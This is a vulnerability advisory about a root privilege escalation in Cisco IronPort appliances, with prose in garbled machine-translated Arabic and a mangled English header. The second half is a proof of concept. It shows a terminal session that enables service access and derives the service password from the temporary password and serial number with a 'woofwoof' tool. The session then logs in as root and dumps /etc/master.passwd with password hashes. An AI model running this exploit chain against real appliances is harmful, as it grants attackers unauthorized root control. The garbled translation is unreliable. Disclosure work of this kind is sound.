تم تحديثه لـ Linux
Cisco Ironport Appliances Excalage Excalation Pronderability Pendor: Cisco Product Productpage: http://www.cisco.com الإصدار (الإصدار) المتأثر: Cisco Ironport ESA - Asyncos 8.5.5-280 Cisco Ironport WSA - Asyncos 8.0.5-075 Cisco Ironport SMA - Asyncos 8.3.6-0 التاريخ: 22/05/2014 الاعتمادات: Glafkos Charalambous CVE: لم يتم تعيينه بواسطة Cisco
الجدول الزمني للإفصاح: 19-05-2014: إخطار البائع 20-05-2014: استجابة البائع/ردود الفعل 27-08-2014: إصلاح البائع/التصحيح 24-01-2015: الكشف العام
الوصف: Cisco Ironport Appliances معرضة لتصعيد امتياز "المشرف" المصادق عليه. من خلال تمكين حساب الخدمة من واجهة المستخدم الرسومية أو CLI ، يسمح المسؤول بالوصول إلى الجذر على الجهاز ، وبالتالي تجاوز جميع قيود حساب "المسؤول" الحالية. يرجع الضعف إلى ضعف تنفيذ الخوارزمية في عملية توليد كلمة المرور التي تستخدمها Cisco للوصول إلى الجهاز عن بُعد لتوفير الدعم الفني.
استجابة البائع: كما هو متوقع ، لا يعتبر هذا ضعفًا بل مشكلة تصلب أمنية. على هذا النحو ، لم نخصص CVE ، لكنني تأكدت من أن هذا ثابت على SMA و ESA و WSA. تضمن الإصلاح العديد من التغييرات مثل حماية الخوارزمية بشكل أفضل في الثنائي ، وتغيير الخوارزمية نفسها لتكون أكثر قوة وتطبيق تعقيد كلمة المرور عندما يقوم المسؤول بتعيين عبارة المرور وتمكين الحساب.
[SD] ملاحظة: هناك حاجة إلى بيانات الاعتماد الإدارية من أجل تنشيط الوصول إلى ممثل الدعم وإعداد عبارة المرور التي يتم استخدامها لحساب كلمة المرور النهائية. [GC] لا يزال لدى مستخدم المسؤول أذونات محدودة على الأجهزة ويمكن أن تتعرض بيانات الاعتماد للخطر أيضًا ، حتى مع وجود كلمة مرور افتراضية تؤدي إلى الوصول الكامل للوصول إلى الجذر.
[SD] يتم تتبع هذه المشكلة لـ ESA بواسطة Cisco Bug ID: CSCUO96011 لـ SMA بواسطة Cisco Bug ID: CSCUO96056 و WSA بواسطة Cisco Bug ID CSCUO90528
التفاصيل الفنية: من خلال تسجيل الدخول إلى الجهاز باستخدام كلمة المرور الافتراضية "Ironport" أو المستخدم المحدد ، هناك خيار لتمكين دعم العملاء عن بُعد. يمكن العثور على هذا الخيار ضمن المساعدة والدعم -> الوصول عن بُعد على واجهة المستخدم الرسومية أو باستخدام حساب CLI Console "Enableiag" وإصدار خدمة الأوامر. يتطلب تمكين هذه الخدمة كلمة مرور مستخدم مؤقتة يجب توفيرها جنبًا إلى جنب مع الرقم التسلسلي للأجهزة إلى Cisco TechSupport للاتصال عن بُعد وتوثيقه بالجهاز.
وجود كلمة مرور مؤقتة والرقم التسلسلي للجهاز من خلال تمكين حساب الخدمة ، يمكن للمهاجم بدوره الحصول على الوصول الكامل للجذر بالإضافة إلى إتلافه ، أو الورق الخلفي ، إلخ.
POC:
root@kali:~# ssh -lenablediag 192.168.0.158
Password:
Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
Available Commands:
help -- View this text.
quit -- Log out.
service -- Enable or disable access to the service system.
network -- Perform emergency configuration of the diagnostic network interface.
clearnet -- Resets configuration of the diagnostic network interface.
ssh -- Configure emergency SSH daemon on the diagnostic network interface.
clearssh -- Stop emergency SSH daemon on the diagnostic network interface.
tunnel -- Start up tech support tunnel to IronPort.
print -- Print status of the diagnostic network interface.
reboot -- Reboot the appliance.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently disabled.
ironport.example.com> service
Service Access is currently disabled. Enabling this system will allow an
IronPort Customer Support representative to remotely access your system
to assist you in solving your technical issues. Are you sure you want
to do this? [Y/N]> Y
Enter a temporary password for customer support to use. This password may
not be the same as your admin password. This password will not be able
to be used to directly access your system.
[]> cisco123
Service access has been ENABLED. Please provide your temporary password
to your IronPort Customer Support representative.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently ENABLED (0 current service logins)
ironport.example.com>
gcc -std=99 -o woofwoof woofwoof.c -lcrypto
./woofwoof
Usage: woofwoof.exe -p password -s serial
-p <password> | Cisco Service Temp Password
-s <serial> | Cisco Serial Number
-h | This Help Menu
Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4
./woofwoof -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019
F508A4
Service Password: b213c9a4
root@kali:~# ssh -lservice 192.168.0.158
Password:
Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
# uname -a
FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014 [email protected]:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64
# cat /etc/master.passwd
# $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $
root:*:0:0::0:0:Mr &:/root:/sbin/nologin
service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh
enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh
adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin
admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh
clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh
smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh
spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin
pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh
ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin